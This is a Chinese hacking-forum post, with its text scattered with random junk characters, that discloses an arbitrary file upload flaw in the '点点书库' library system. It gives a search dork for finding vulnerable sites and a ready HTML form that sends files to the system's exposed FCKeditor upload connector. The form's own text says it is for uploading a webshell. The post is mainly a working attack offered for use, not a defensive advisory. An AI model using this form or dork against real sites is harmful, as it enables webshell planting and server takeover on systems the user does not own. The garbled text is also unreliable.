主题:图书馆系统任意文件上传漏洞
c9 ]0 x5 K3 E/ y, Y* Y4 m1 A7 B 作者:冰锋刺客
; Z( }% S" n& z8 ] 厂商:点击书(dianjishu.com)) j/ e2 w, d- d4 q
日期:2012-6-217 o6 W' ~# Z4 J' X! p3 o; e
( c. M5 z2 t2 X6 Z, W/ {& F$ q& I5 b
I 概述
0 o+ z. ^1 F5 V, Z$ Q" A, O0 D 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
u9 z6 i) |( K" V' C II 简介
% N. _" C2 R% ] X( E; x I 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"4 V1 L( ?! m% p. n/ H
补充一个漏洞" w k) O: i) g1 W2 y3 k! _
<form id="frmUpload" enctype="multipart/form-data"+ {$ O9 |8 x7 b" c1 h* ?1 b, `
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>6 ^/ K9 I$ E b1 M& k! s
<input id="btnUpload" type="submit" value="操翻他">% `- V% Z9 S8 C% d O/ C
</form>6 m8 E1 `0 E8 r" J) r0 M
你们懂的: n1 |$ ]# Q& a: O" m
那傻逼提供还需要改包.
( h6 K+ U8 d, r7 v: }# _# K 自己看了下源代码发现fckeditor
) q/ [0 J: ]- ?$ o 直接秒杀. q7 z( Y; T4 Z& m" s4 p" Z6 a
|
发表于 2012-9-10 21:20:59
收藏
支持
反对